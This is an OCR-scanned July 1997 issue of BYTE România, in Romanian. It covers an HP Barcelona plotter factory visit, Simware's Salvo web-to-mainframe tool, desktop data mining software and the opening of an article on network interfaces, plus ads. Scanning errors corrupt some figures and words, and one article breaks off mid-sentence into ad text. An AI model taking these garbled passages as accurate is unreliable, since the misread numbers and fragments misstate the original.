Cartela telefonică celulara Nokia transfor-
mă notebook-ul într-un telefon fără fir.
comenzii vocale, fără folosirea tastelor.
Firma Nortel Europe a introdus cea mai
avansată tehnologie de calcul într-un dis-
pozitiv inteligent, numit telefon de reţea.
Acest aparat de buzunar conţine un set de
cipuri Java care-l transformă într-un mic
terminal client de comunicaţii. El are un
ecran sensibil la atingere, ce integrează
tehnologia de culegere a datelor bazată pe
creion digital precum şi recunoaşterea în
timp real a scrisului de mână. Nortel
intenționează să furnizeze telefonul de rețea
în primul trimestru al anului următor.
- Bob Emmerson
[din BYTE, o publicatie McGraw-Hill, Inc.
Adaptare - Mircea Sabău]
pa S Reportaj
Pe plaiuri catalane
Sea 1 perioada 20-21 iunie mi s-a
oferit plăcuta ocazie de a vizita,
i împreună cu colegii Florin
Crăciunoiu de la TVR şi Răz-
van Anghelidi de la Chip, Hewlett-Packard
Espanola S.A., Barcelona Division, pe scurt
HP BCD. Şi, cum bănui că sunteţi mai puţin
interesaţi de o descriere a oraşului, situat
într-un loc binecuvântat de zei, de extraor-
dinarele construcţii ale lui Gaudi, de ames-
tecul tuturor seminţiilor pământului de pe
La Rambla, sau de cum se mai simte Gică
Popescu la F.C. Barcelona, voi trece direct
la obiectivul principal alvizitei, fabrica HP
şi noile serii de plotere/imprimante de for-
mat lat HP DesignJet 2500CP si 2000CP.
HP a început producţia în divizia barce-
loneză, în august 1985, cu 35 de angajaţi,
ajungînd în prezent la peste 1.500 de anga-
jaţi (cu o medie de vârstă de 33 de ani, din-
tre care peste 80% au studii superioare), la
o cifră de afaceri, în anul fiscal 1996, de
175,097 milioane de pesetas, HP BCD fiind
exportatorul numărul 1 de produse elec-
tronice din Catalonia și numărul 2 din
Spania. Acum, aţi putea întreba de ce şi-a
deschis HP fabrica în Spania şi nu în Româ-
nia? Dar, la fel de bine, v-aţi putea întreba
şi de ce au debarcat aliaţii în Normandia și
nu la Vama Veche... Numai că aceasta-i altă
poveste și poate că n-aş mai fi amintit de
ea dacă, încă de la intrarea în fabrică, n-am
fi realizat că, încă înaintea summit-ului de
la Madrid am fost pasaţi în valul doi la
admiterea în NATO. Mai exact, chiar lângă
recepție era atârnat un banner cât se poate
de drăguţ, realizat pe un HP DesignJet
2500CP, despre care o să vă povestesc, nu
vă impacientaţi, pe care erau adresate
urările de bun venit ziaristilor din țările din
Estul Europei... Şi lista începea cu Româ-
nia (wow! Locul 1 în valul 2 L), continua
cu Slovacia, Bulgaria, Iugoslavia, Croaţia,
Slovenia şi Ucraina. Şi nici urmă de Polo-
nia, Cehia şi Ungaria. Acu', ce rost avea
amestecarea marketingului cu politicul, nu
mă întrebaţi, că nu ştiu. Mais passons!
Prima prezentare a fost susținută de dl.
Bernard Meric, General Manager, HP
BCD, care ne-a făcut o scurtă prezentare a
pieţei şi a tendințelor de evoluţie a acesteia.
În domeniul imprimării cu jet de cerneală,
HP distinge trei segmente de piaţă diferite:
(de) consum, (de) birou şi profesional; şi se
adresează în mod specific fiecărui segment
de piaţă în parte, familia HP Designjet fiind
alcătuită, în prezent, din modelele 350C,
330, 750C Plus şi respectiv 2000CP şi
2500CP. În ajunul sosirii noastre la Barce-
lona, HP BCD tocmai sărbătorise livrarea
celei de-a 500.000-a imprimante Design-
Jet. În domeniul imprimantelor de format
lat, pe care tot plotere mi-e mai ușor să le
numesc, HP a vândut, în 1996, circa
235.000 de unităţi, deţinând 65% din
piață. DI. Meric ne-a vorbit apoi despre
tendinţele care se înregistrează pe piaţă,
remarcând că se pune un accent tot mai
mare pe viteza de imprimare, pe trans-
miterea documentelor prin internet, pe
conceptul de 'distribuie si imprima’,
fotografie digitală, imprimare la cerere
(tiraje reduse) și pe imprimarea digitală.
Astfel, dacă piaţa de imprimare a fost evalu-
ată, în 1995, la 25 de miliarde de dolari, din
care doar 4 miliarde de dolari reveneau
imprimării digitale, se estimează că, în anul
2001, piaţa va ajunge la 38 de miliarde de
dolari din care 15 miliarde vor reveni
imprimării digitale. Acest lucru se va dato-
ra, în parte, faptului că preţul de imprimare
va scădea cam de trei ori dar, în schimb, se
va imprima de circa 10 ori mai mult. HP se
adresează cu noile plotere, nu doar pieţei
uzuale de CAD, care se așteaptă să crească
cu un ritm de 10% anual, ci și, din ce în ce
mai mult, pieţei artiştilor grafici, care se
estimează că va creşte cu un ritm anual de
18%. De altfel, pentru a veni în sprijinul
designerilor şi artiştilor grafici, care în mod
uzual nu au un volum de imprimări care să
justifice achiziţionarea unui ploter, HP va
sprijini crearea unei reţele de 'furnizori de
servicii de imprimare!.
O vizita la HP Espanola S.A.
De Romulus Maier
DI. Bernard Meric
general manager la Hewlett-
Packard Barcelona Division
Directorul departamentului de cercetare
(R&D) Dewey Baker, ne-a prezentat (sau
ne-a reamintit) principalele caracteristici şi
avantaje oferite de imprimarea cu jet de
cerneală. Reamintesc cîteva dintre perfor-
manţele fascinante la care a ajuns această
tehnologie. Temperatura stropului de
cerneală creşte de la 209C la peste 4000C
în 4 microsecunde, ceea ce corespunde unei
viteze de încălzire de 100.000.000
C/secundă; pe un timbru poştal încap
300.000 de camere de încălzire a cernelii;
volumul unui strop de cerneală este de 35
picolitri; capul de imprimare ejectează
8.000 de stropi de cerneală pe secundă. Şi
miniaturizarea continuă, rezoluţia creşte
(în prezent se lucrează la 600 dpi pe culoa-
re), vitezele de lucru sînt din ce în ce mai
mari, formatele pe care se imprimă sunt din
IULIE 1997 BYTE România 21
Reportaj
*
Pe plaiuri catalane
DI. Dewey Baker
RED Manager Hewlett-Packard
Barcelona Division
ce în ce mai late, preţul imprimării este în
continuă scădere. Şi, pentru a-şi menţine
poziţia de lider pe piaţă şi a-şi păstra avan-
sul tehnologic, HP investeşte în continuare
masiv în cercetare şi acordă importanță
maximă tuturor detaliilor, pornind de la
capetele de imprimare şi pînă la cerneală
şi calitatea hirtiei.
Michael Thompson, Current Product
Manager HP BCD, ne-a făcut o prezentare
a noilor modele HP Designjet 2500CP şi
2000CP, iar Pedro Padilla, LFP Program
Manager (LFP — Large Format Printer) a
făcut o demonstraţie practică cu modelul
2500CP. Să ne concentrăm puţin atenția
asupra vedetelor.
HP DesignJet 2500CP si 2000CP au o
rezolutie de 600 dpi și dispun de algoritmi
performanti care permit obtinerea unor
imagini de calitate superioară (gradient de
culoare, granularitate, umplere, etc.).
Ploterele pot lucra cu 2 seturi de cerne-
luri, unul destinat posterelor/imaginilor
care vor fi expuse în interior şi un al doilea
sistem rezistent la ultraviolete pentru
posterele menite a fi expuse în exteriorul
clădirilor, caz în care se recomandă și la-
minarea suportului imprimat (pentru rezis-
tență la umiditate). Trecerea de la un sis-
tem de cerneluri la celălalt se poate face în
doar cîteva minute, un set avînd 3 compo-
nente: tancurile (rezervoarele) de cerneală,
capetele de imprimare și dispozitivul de
curățire a capului de imprimare. Capetele
22 BYTE Romania LULIE 1997
de imprimare detectează automat momen-
tul în care cerneala este insuficientă, pen-
tru a imprima 0 imagine întreagă, se poziți-
onează deasupra tancurilor de cerneală de
unde se alimentează automat (nu există
conducte de cerneală mobile), iar după ce
termină o lucrare sunt parcate automat dea-
supra dispozitivelor de curăţire, care curăță
şi previn uscarea cernelii și înfundarea
duzelor de imprimare.
Lângă capetele de imprimare este plasat
un mic scaner care, prin scanarea unei fâ-
şii imprimate de probă, permite, pe de o
parte, o calibrare automată a culorilor -
putându-se selecta unul dintre cele 3 stan-
darde industriale de imprimare mai răspîn-
dite: SWOP (Standard Web Offset Print-
ing), Eurostandard si Toyo - si, pe de alta
parte, detectarea unor eventuale duze
infundate și activarea unor duze de rezervă
din capul de imprimare!
Aceste modele dispun și de facilități de
încuibare pentru utilizarea optimă a supor-
tului de imprimare - în cazul în care imagi-
nile sunt mai mici decât lățimea suportu-
lui ele sunt salvate pe discul hard de 2GB
cu care este echipat ploterul şi se calculează
amplasarea lor optimă astfel încât să fie uti-
lizat minimum de suport.
Modelul 2500CP are integrată o soluție
RIP (Raster Image Processor) cu Adobe Le-
vel 2 Postscript, drivere pentru Mac, Win-
dows 3.1, Windows 95 si Windows NT si
ocartela HP JetDirect pentru conectivitate
Ethernet, 20 MB RAM (extensibili la 64
MB RAM) plus 4 MB RAM memorie de
imprimare.
Modelul 2000CP este gîndit să func-
tioneze cu RIP extern, eventual de la un
alt producător, nu are disc hard şi este
echipat doar cu 8 MB RAM, plus 4 MB
RAM memorie de imprimare. Tot manage-
mentul de culoare este asigurat de RIP-ul
extern.
Ambele modele dispun de 3 moduri de
imprimare: rapid, normal și extra, ultimul
mod de lucru permițând obţinerea de
imagini de calitate fotografică. În funcţie
de modul de lucru selectat, imprimarea
unui format AO durează între 8 minute si
30 de minute.
De calitatea imaginilor şi performanțele
modelului 2500CP aveam să ne convin-
gem, atât privind posterele cu care era
ornată sala de conferințe, cât și în cursul
demonstraţiei practice care a urmat. După
demonstraţii, am avut ocazia să facem o
scurtă vizită în fabrică, care semăna de par-
că era trasă la indigo cu fabricile HP vizitate
în SUA, dar nu din lipsă de imaginaţie, ci
datorită eficienței şi productivității verifi-
cate în timp şi multiplicate, bănui, în toate
unitățile de producție HP. Impresionant!
Apoi, înapoi, aşteptând valul doi... E
Domnul Romulus Maier este director general
la Computer Press Agora s.r.]. Poate fi contac-
tat prin e-mail la adresa:rmaier@agora.ro.
Linia de productie HP DesignJet.
d
Baze de date
Salvo de la Simware vă permite să folosiți standarde Web pentru accesul la baze de
date de pe sisteme mainframe. De Alexa Bielefeld, Rick Martin si Brian Wachter
Utilizarea Web cu baze de date vechi
ana nu de mult, conectarea la
un sistem mare de la desktop a
insemnat emulare de terminal
si o infrastructura dedicata de
rețea, cu toate limitările inerente. Puteţi
obţine posibilitatea de conectare la apli-
caţiile vechi care lucrau în mod caracter şi
la datele aplicaţiei de la un ecran mod ca-
racter.
Salvo de la Simware oferă mai mult decât
posibilitatea de preluare a datelor pentru
terminal (screen-scraping). Salvo oferă
facilități pentru aplicaţiile vechi fără să fie
necesare modificări de partea mainframe.
Mediul de dezvoltare Salvo utilizează
obiecte de informaţii care separă pre-
zentarea informaţiei de locul si logica infor-
mației prezentate.
Componente Salvo
Partea esenţială din Salvo este o compo-
nentă server executabilă pe Microsoft Win-
dows NT Server 3.51 sau o versiune mai
mare. Cu ajutorul unei GUI proiectantii
creează reguli pentru informații, care per-
mit unui utilizator accesul la sursele de date
şi lucrul cu informaţiile aflate acolo. Re-
gulile permit crearea de obiecte de infor-
maţii care pot fi incluse în aplicații.
Deoarece mediul de dezvoltare Salvo
foloseşte HTML, toate sarcinile de pro-
gramare a obiectelor de informaţii pot fi
făcute prin intermediul unui navigator
Web. Obiectele rezultate prezintă infor-
maţiile pentru utilizatori printr-un con-
tainer conform HTTP (browser Web) sau
ODBC. Simware lucrează la oferirea de
legături la Salvo pentru tehnologiile COR-
BA (Common Object Request Broker
Architecture) și COM (Component Object
Model). Aplicațiile client pot fi realizate cu
orice unelte care asigură suport ODBC, ca
de exemplu PowerBuilder, VisualBasic și
VBA (Visual Basic for Applications).
Sursele de date care pot fi unite în apli-
caţii dezvoltate cu Salvo includ aplicaţiile
pentru terminale 3270, 5250, VT 100 şi
VT220 si sursele de date ODBC. Salvo 3.5
este livrat cu drivere pentru surse ODBC
Informix, Ingres, Microsoft SQL Server,
Oracle si Sybase. Driverele pentru pro-
dusele altor furnizori pot fi obtinute de la
acestia.
Pentru o baza de date relationala numele
sursei de date si un sir de conectare sunt
specificate in interfata Salvo. Pentru apli-
Lucrul cu date
După ce aţi definit „ce?“ (sursa de date) şi
„cine?“ (utilizatorul), trebuie să construiți
„cum?“ (regulile). Definiţi reguli pentru
informații pentru a stabili accesul la date gi
pentru a genera obiectele de informaţii.
Procesarea la Salvo
Clienţi
: Constructor informații
(O Clientul lansează cerere HTTP sau ODBC.
€) Serverul Salvo are reguli prestabilite cu
instrucțiuni care prelucrează cererea.
(9 Regulile de surse de date aleg sursa de
date ţintă.
Generatoare de informații colectează
și formatează datele.
© Constructoarele de informații
„ Generaor de informații
"Surse de
date tints
manipuleaza datele.
O inerpretatoare de context trimit
rezultatele la alte reguli, filtrând eventual
anumite rezultate.
(9 Rezultatele sunt trimise înapoi la
client ca HTTP sau ODBC.
Datele din baze de date vechi care lucrau cu terminale pot fi
transformate cu reguli date de utilizatori în pagini HTML.
caţiile pentru terminale se specifică de
exemplu o adresă IP şi un număr de port
pentru serverul TN3270, un tip de emula-
re, o dimensiune ecran şi o pagină de cod.
Suportul pentru code-page oferă facilități
de utilizare de limbi diferite la aplicaţiile
mainframe. Nu trebuie să aveţi ICP/IP
instalat pe mainframe pentru a beneficia de
facilităţile Salvo: acesta lucrează cu gate-
way SNA la TCP/IP ca Microsoft SNA Ser-
ver. Toţi utilizatorii aplicaţiei finalizate au
nevoie de identificator utilizator și parolă.
Se poate defini și acces pentru grup.
Există trei genuri de reguli: generatoare
de informaţii, constructoare de informații
şi interpretatoare de context.
O generatoare de informaţii este necesară
pentru fiecare sursă de date accesată de apli-
catie. Poate fi definită ca necesară în editor,
dând posibilitate aplicaţiei să urmărească
sursele de date atunci când migrează de pe
o platformă pe alta. Generatoarele de infor-
maţii pot lucra şi independent de sursele de
date pentru a executa un algoritm, citi din-
tr-un fişier sau reîntoarce text static.
Constructoarele de informaţii se ocupă
IULIE 1997 BYTE România 23
Fundamente
Baze de date
cu procesarea instrucțiunilor. Ele lucrează
cu tabelele de obiecte de informaţii create
de generatoarele de informaţii. Câteva
exemple de operaţii care pot fi executate cu
o tabelă sunt:
* legare (join or union)
* sortarea şi filtrarea datelor
* calcule aritmetice
* ştergerea de coloane sau tabele
Interpretatoarea de context redirectează
o cerere către regula corespunzătoare infor-
maţiei, pe baza contextului pentru cererea
respectivă. Contextul se poate referi la uti-
lizator sau grupul care a făcut generarea,
sau data şi timpul cererii. Utilizatorii văd
rezultatele configurate ca să includă doar
datele de la sistemul gazdă sau ODBC def-
inite de proiectant.
Forța modelului de obiecte de informaţii
constă în modularitatea lui. Regulile pen-
tru informaţii pot fi stabilite individual şi
testate, ca apoi să fie incluse în aplicaţia
completă. Regulile pentru informaţii sunt
memorate într-un depozitar pentru
obiectele de informaţii, de unde pot fi
folosite şi refolosite.
Pentru clienți Web, obiectele de infor-
maţii Salvo sunt afişate cu un template
implicit HTML. Regulile de informaţii pot
invoca un template specific sau un script de
la server. Aceste acțiuni specifice sunt spe-
cificate sau modificate atunci când creaţi
regula pentru informaţii corespunzătoare
obiectului. Fişierele script sunt scrise acum
cu Rexx, totuși Simware lucrează la imple-
mentari VBScript si Jscript.
„ Un alt punct forte la Salvo este că oferă
proiectantilor control asupra locului în care
se află un script. Pentru securitate toate
scripturile care returnează date log-on
despre conectare se pot masca pentru client.
Dacă se doreşte mutarea sarcinilor de pre-
lucrare la client, scripturile care generează
elemente GUI complexe care potsă fie puse
în template-ul care se execută la client.
Scripturile de partea server pot fi scrise
sau cu un editor integrat sau cu unul extern
şi apoi vor fi copiate în Salvo. Se oferă şi
mostre de cod pentru a ușura crearea de
scripturi. Într-un template, facilităţile stan-
dard HTML ca şi casete de selecție, butoane
radio şi câmpuri pentru introducere de text
pot fi folosite pentru a genera ieşire pe
24 BYTE România. |ULIE 1997
care serverul Salvo trimite la regula de infor-
maţii corespunzătoare. În plus, orice lim-
baj script suportat de navigatorul client, ca
JavaScript, Jscript şi VBScript poate fi uti-
lizat de template pentru a analiza și modi-
fica conţinutul sau schimba intrarea sau
ieşirea. Aceste instrucţiuni sunt transmise
printr-un şir CGI executat ca și cerere ser-
ver standard, ca şi un URL introdus într-un
navigator.
De exemplu, Scam a converti un ecran
3270 în HTML fără a se apela la o regulă
de informaţii, metoda simplă de preluare
este plasarea unui şir de date CGI între
se modifică în continuu din partea utiliza-
torilor. Dacă scopul este, de exemplu să
oferim unui utilizator la distanță doar
anumite ecrane ale programului de regăsire
date, vechiul model impunea proiectanţilor
să modifice aplicaţia veche din COBOL (sau
în oricare limbaj a fost făcută). Salvo schim-
bă acest model prin folosirea HTML, script
pe server şi reguli pentru informaţie. Be-
neficiind de avantajele oferite de posibili-
tatea Salvo de transformare în pagini
HTML a ecranelor de terminal, progra-
matorul poate utiliza reguli de informaţii
interpretabile în context pentru a controla
ACTION="salvocgi.exe”
INPUT TYPE="hidden" NAME="ScriptName" VALUE="_btInit">
—
Ci. Grivitei 355-357, Sect. 1, Bucuresti,
Tel./Fax: 223.1443
Sediul Central Pw |
Bd. Unirii 15, Sect.5, Bucuresti,
Tel.: 336.2595, Fax.:336.7568
Centrul ae Vanzari hal
Cl. Dorobantilor 152, Sect.1 „Bucureşti,
Tel./Fax: 230.7737, 230.4032
oo TE
x
42 BYTE Romania “IULIE 1997
ILLUSTRATIA: MARK STEARNEY © 1997
INTERNATIONAL
Data mining
dela birou
Uneltele intuitive de minerit în date ajută managerii de nivel mediu
în luarea unor decizii mai bune.
De Peter Hofland și Jim Utsler
a rezultat al nivelării din cadrul companiilor europene,
a apărut un cerc nou de angajaţi care contribuie la luarea
deciziilor. Cu toate că s-ar putea să nu ia ei decizia finală,
acești oameni au responsabilitatea recomandării unor
soluţii pe baza cunoștințelor despre afacerile firmei. Această respon-
sabilitate mărită duce la creşterea cererii din partea profesioniştilor
de unelte data mining, care le permit să recomande acţiuni pentru
manageri mai rapid și în cu-
noştință de cauză. Deoarece
aceşti profesionişti nu sunt
specialişti în analiza datelor si
nici statisticieni formaţi ei au
nevoie de unelte uşor utiliza-
bile care relevă în mod fiabil
relaţiile complexe în bazele de
date cu beneficiari, produse şi
analize de piaţă. „Din cauza
creşterii explozive a puterii sis-
temelor PC desktop, baze de
date care au frecvent peste un
milion de înregistrări sunt
analizate cu un PC standard
Windows NT“, spune Eric
Tocatlian, director de marke-
ting la Isoft, un producător de
software pentru data mining.
Până nu de mult, majori-
tatea organizaţiilor mari aveau
statisticieni angajaţi pentru
analiza datelor vitale referi-
toare la activitate. Totuși acest
lucru se schimbă pe măsură ce
managerii de marketing și pro-
duse au nevoie să identifice
configuraţiile şi evoluţiile be-
neficiarilor, să găsească gru-
pări şi lipsuri în date, să creeze
profiluri şi să detecteze ano-
malii fără să mai aștepte ca sta-
tisticianul să aibă timp disponi-
bil. Şi de foarte multe ori, raportările statisticianului sunt mormane
de informaţii depășite şi povești despre ce reprezintă aceste statis-
tici pentru organizaţie.., Într-o lume perfectă“, afirmă preşedintele
institutului SAS Jim Goodnight „la companii, cei care iau decizii ar
trebui să lucreze cu experţi în evaluări cantitative. Dar puţine com-
panii îşi pot permite acest lucru“.
Noile aplicaţii data mining pentru desktop oferă unelte de ana-
liză puternice şi ușor de utilizat pentru profesioniștii din mediul de
afaceri care fac marketing, finanţe sau planificare strategică. O trăsă-
tură comună a acestor unelte este că ajută utilizatorii să se concen-
treze la problemele de afaceri și nu la cele spinoase ale analizei
datelor.
Uneltele desktop pentru data mining prezintă multe dintre ace-
leaşi tehnologii inteligente de recunoaştere de şabloane ca și unel-
tele sofisticate din care provin:
rețele neuronale, arbori de
decizie, inducţie de reguli şi
logică fuzzy. (Pentru mai mul-
te informaţii privind aceste
tehnici de analiză vedeți: End-
less Search, BYTE, nov.1995).
Interfete intuitive
Elementul cheie de la majori-
tatea acestor programe este
modul vizual in care prezinta
datele. De exemplu, Spotfire
1.0 de la IVEE Development
System, un sistem data mining
pentru Windows 95, NT şi
Unix are câteva cursoare uti-
lizabile câte una pentru fiecare
variabilă statistică. Aceste cur-
soare pot fi folosite pentru a
modifica reprezentarea date-
lor. Este astfel posibil să se par-
curgă în mod interactiv vari-
abilele și să se detecteze confi-
guratiile interesante. Este de
asemenea posibilă afişarea da-
telor împreună cu informaţii
în fundal, cum ar fi o hartă
pentru a uşura detectarea de
configurații (pattern).
Spre deosebire de mineri-
tul de date tipic algoritmic,
bazat pe tehnici AL (inteligență
artificială) menţionate mai sus, programele data mining au o inter-
față vizuală pentru o utilizare ușoară. Au totuşi limitări, în special
atunci când sunt comparate cu flexibilitatea reţelelor neuronale.
Utilizatorii se pot baza doar pe propriile cunoştinţe despre setul
dat de date. Pe de altă parte, aşa cum arată Christopher Alberg de
la IVEE Development, majoritatea profesioniştilor cunosc pro-
priul domeniu de activitate mai bine ca o reţea neuronală“.
IULIE 1997 BYTE România 43
Internaţional
Data Mining de la birou
Într-adevăr,antrenarea unei reţele neu-
ronale depinde frecvent de persoana care
antrenează rețeaua. Persoana poate bloca
o organizaţie într-o viziune incompletă şi
subiectivă asupra datelor. Acesta este moti-
vul pentru care suporterii mineritului vizual
de date afirmă că dacă se lucrează cu atenție
şi cu experienţa și cunoştinţele pe care
managerii o aduc la rezolvarea sarcinilor,
este posibilă transformarea rapidă a datelor
vizualizate într-o strategie efectivă pentru
activitate.
Unii proiectanți adaugă tehnici de vizu-
alizare mai performante la rețelele neu-
ronale și la sistemele bazate pe arbori de
decizie. Cognos, un furnizor de vârf de
unelte OLAP (on-line analytical processing)
a cumpărat recent Right Information Sys-
tems, un producător de soft bazat pe rețele
neuronale pentru modelare și elaborare de
previziuni pentru afaceri. Companiile
îmbină acum ambele abordări pentru a
face ca softul lor să fie mai uşor de utilizat.
Un alt exemplu este proiectul de dez-
voltare cu numele de cod DMINE de la SAS
Institute, o combinaţie de reţele neuronale,
arbori de decizie şi tehnici de vizualizare des-
tinat modelării predictive a domeniilor afa-
cerii. Se aşteaptă ca DMINE să apară în
această toamnă. „Azi“, spune Phil Winters,
vicepreşedintele pentru marketing de la SAS
S pre deosebire de programele de analize
statistice standard, mineritul vizual per-
mite utilizatorilor să exploreze interactiv datele
folosind grafice, diagrame sau interfeţe utile
care pot utiliza culori, filtre, animaţie și diferite
nivele de detalii. Spotfire 1.0 de la IVEE, de
exemplu, poate reprezenta distribuţia datelor
prin 2D scatter plot. Împreună cu repre-
zentarea se creează câteva cursoare utiliz-
abile la manipularea reprezentării datelor.
Ecranul Spotfire arată sus, la dreapta, o
bază de date de clienţi ai unui magazin.
Fiecare marcaj colorat reprezintă un client cu
culoare diferită pentru sexe, cu dimensi-
unea marcajului în funcţie de banii cheltuiţi
pe haine. Puteţi selecta detaliile unui client
prin selectarea cu maus a marcajului. Pen-
tru a filtra doar clienţii care au cheltuit peste
500$ de exemplu, deplasaţi cursorul cores-
punzător din dreapta. Ecranul de jos afișează
această selecţie. Simultan, ecranul mai arată
că majoritatea acestor clienţi au peste 45
de ani (axa x), două treimi sunt femei (roșu)
și majoritatea au cheltuit peste 2500$ (axa
y). Este atât de ușor să se identifice clar
segmentul de piaţi din baza de date cu clienți.
44 BYTE România LULIE 1997
Data Mining la desktop
La firmele mici și medii, procesul
de minerit în date începe de obi-
cei cu o ipoteză de afacere for-
mulată de, și bazată pe înțelegerea
afacerii de către utilizator.
Utilizind unelte data mining pe
desktop utilizatorul constru-
iește un model, finisează ipo-
tezele și execută analiza.
Acest proces poate fi repetat.
ipotezelor
După validarea ipo-
tezei finale, utiliza-
torul ia decizia.
Procesul de luare a deciziei ține seama de datele pertinente
și de cunoștințele avute de manager despre afacere
Institute Europe, „cei care iau deciziile în afa-
ceri pierd mult timp așteptând după inte-
rogări de baze de date. Noi propunem o me-
todă mai proactivă de modelare predictivă“.
Abordare în cinci pași
În efortul de a face data mining accesibil pen-
tru o audienţă mai largă și de a ajuta pe cei
care iau decizii să ruleze sisteme data min-
ing pe PC, SAS Institute promovează o
metodologie care include cinci pași de bază:
eşantionare, explorare, manipulare, mode-
lare și evaluare. Această metodologie su-
gerează eşantionarea unor porţiuni mai
reduse din baza de date, şi nu a întregului set
de date pentru reducerea timpului de proce-
sare. Vizualizarea datelor ajută utilizatorul
să găsească subseturile adecvate pentru a le
eşantiona. Dacă datele sunt de complexitate
prea mare pentru a fi reprezentate grafic,
atunci este nevoie de metode statistice
tradiționale ca analiza factorilor, grupurilor
de valori şi corespondenţei între acestea.
Pe baza unei asemenea explorări, un uti-
lizator poate curati și actualiza partea selec-
tată a datelor și apoi executa procesul de
mining care calculează criteriile cele mai per-
tinente care aparțin unui set de date dat
(modelare). Înr-o aplicaţie de marketing
direct aceste criterii pot fi separate (de exem-
plu dupa vârstă, sex şi venit) între grupurile
de beneficiari. În faza finală a procesului,
utilizatorul evaluează aceste modele şi
verifică valoarea lor pentru problema de
afaceri reală.
Isoft a lansat anul trecut o versiune
redusă a produsului propriu, numit Alice.
Alice utilizează o gamă largă de algoritmi
statistici pentru construirea de modele de
previziuni. Programul reprezintă rezultatele
modelului cu arbori de decizie, oferind uti-
lizatorului posibilitatea de a sesiza imediat
corelaţiile de bază dintre date şi permițând
verificarea ușoară a ipotezelor.
Partea care face ca arborii de decizie să
fie atât de atrăgători la programele de data
.
Data Mining de la birou
Internaţional
mining pentru desktop, este posibilitatea de
a reprezenta volume mari de date în mod
eficient. Cu un arbore de decizie, utilizatorul
poate forța separări, contopi noduri, reduce
sau extinde ramuri și determina numărul de
parametrii dintr-un arbore. În plus, utiliza- -
torul poate selecta uşor acele ramuri care
sunt interesante pentru el.
Documente explicabile
Sistemele data mining pot detecta modul
in care unele obiecte sau variabile afecteaza
altele, localiza schimbările în timp sau iden-
tifica tendinţe în bazele de date cu benefi-
ciari. Totuși, modul în care exprimă aceste
informaţii este adesea o enigmă și este prea
complicat pentru a fi înţeles de unii mana-
geri. „Acesta nu este adecvat utilizatorilor
din lumea afacerilor“, spune Dr Kamran
Parsaye, CEO la Information Discovery Sys-
tems. Sistemele OLAP interactive permit de
exemplu utilizatorilor să mărească detaliile.
Dar facilităţile de zoom prezintă infor-
maţii în tabele care pot să nu fie clare pen-
tru cei care nu sunt experți. „Avem nevoie
de un limbaj care ajută echipamentele să-şi
exprime cunoştinţele pentru beneficiul
direct al utilizatorilor din lumea afacerilor“,
spune Parsaye.
Informaţiile de ieşire din sistemele data
mining ar trebui exprimate într-o formă
denumită documente explicabile de către
Parsaye. Documentele explicabile generează
automat texte cu hyperlink, grafuri si rezu-
mate de date pentru a exprima influente,
INFORMATII
UTILE
http: ‘Ihwww. sas. com/ ioe
î Information EN pa
1987 Discovery Systems
eos Hermosa Beach, CA
ai coy
Soe -310-937-3600 ere
ie aes
„Tel Aviv, Israel 006] a
+972-3-5631919 — http:/Iwww
of :+972-3-5611945 ae com
afinități, comparații, variaţii şi tendinţe iden-
tificate în date.
Documentele explicabile, în forma
implementată în sistemul Intra/Knowl-
edge realizat de firmă explică rezultatele
procesului de data mining în fraze simple
ca: „Vânzările au crescut în ultimul trimes-
tru deoarece vânzările de suc de portocale
în Arizona au fost peste aşteptări datorită
reducerilor de preţ“.
Intra/Knowledge oferă rezultate genera-
te automat dintr-o bază de date si care sunt
oferite pe un intranet de firmă. La o insti-
tuţie financiară, de exemplu, programul ar
putea citi datele brute şi documentele gene-
rate în fiecare zi, ar putea identifica tendinţe
esenţiale și apoi converti analiza în text în
Engleză ușor de înţeles şi grafice 3D.
O abordare alternativă, inducția de
reguli, lucrează cu seturi de condiţii care
nu sunt ierarhice, spre deosebire de natura
strict ierarhică a arborilor de decizie. Spre
deosebire de rețelele neuronale, inducția de
reguli permite, de exemplu, determinarea
atât a regulii de probabilitate, cât şi a erorii
probabile a regulii.
Deţinirea regulilor
Cu toate că nu oferă rapoarte în format gra-
fic, WizWhy, o unealtă de minerit în date cu
inducție de reguli dezvoltată de WizSoft
pentru Win 95 şi NT oferă utilizatorilor
posibilitatea să configureze analiza prin
definirea unei serii de parametrii. Aceşti
parametrii includ probabilitățile minime
pentru reguli şi numărul minim de cazuri
pentru fiecare regulă. Acest lucru este
comparabil cu utilizarea arborilor decizio-
nali, care vă permit să limitați interogările
prin finisarea arborilor și numărului de
ramuri.
Aceste reguli cantitative de inducţie de
reguli au fost frecvent utilizate de specialişti
din cercetarea medicală, pentru a descoperi
de exemplu şabloane între simptome şi boli.
Dar şi WizWhy şi utilizatori cu mai puțină
experienţă pot analiza baze de date cu bene-
ficiari şi verifica deviații, frecvenţa deviaţii-
lor şi nivelul de probabilitate a regulilor
detectate fără să fie nevoiţi să înțeleagă algo-
ritmul complex care stă la bază.
Cu toate că generaţia apărută de produse
desktop pentru data mining nu poate să
înlocuiască un depozit de date la o între- .
prindere mare, ea îmbunătăţeşte eficiența
pentru mulți manageri care iau decizii: $i
aduc data mining la organizaţiile medii şi
mici care nu-şi putea permite un specialist
pentru analiza datelor
Peter Hofland si Jim Utsler sunt ziarişti şi scriu
despre tehnologie la The Visual Consultancy
Corporation din Amsterdam. Îi puteţi găsi la
100544.307 Qcompuserve.com
[din BYTE, o publicaţie McGraw-Hill, Inc.
Adaptare - Darvas Attila]
dumneavoastră!
Mai ieftin ca fax-ul,
Mai rapid ca DHL-ul!
Cele mai moderne, ieftine
şi comode soluții de
comunicaţii electronice
şi conectare la Internet,
de acum și la dispoziția
EUnet=
PERIE SE Sa a ERIE AERO TINE a Connecting Europe since 1. E DEO EREZIE RE SSE DE
Internet
TCP/IP
telnet
ftp
gopher
www
EUnet Romania SRL
Modem: 410.1162, 8N1, Username: info, login: info,
Tel: 4100100, Fax:4103883, E-Mail: info@eunet.ro
Bd. Unirii 20, Bl. 5C, Et. 2,
Ap. 14, Sect. 4, București
IULIE 1997 BYTE România 45
Adio GUI,
alut
NUI
Interfeţele utilizator orientate rețea
își fac apariţia la calculatoare PC şi
cele de rețea.
De Tom R. Halfhill
aca aveti un calculator care are ecran si este legat in
rețea atunci trebuie să citiți acest articol. De ce? Sunt
în curs de apariţie peste o duzină de interfețe utiliza-
tor orientate rețea pentru PC și NC şi în acest an vor
fi oferite de firme ca Apple, IBM, Lotus, Microsoft, Netscape, Ora-
cle, Sun și alții. Este cea mai mare revoluţie la interfețele grafice
GUI din 1984 pana acum. $i are loc aşa de repede, că nici cuvin-
tele de desemnare a lor nu pot ţine pasul. Nimeni nu este de
acord cu denumirile: NC GUI (pentru interfeţe grafice utilizator
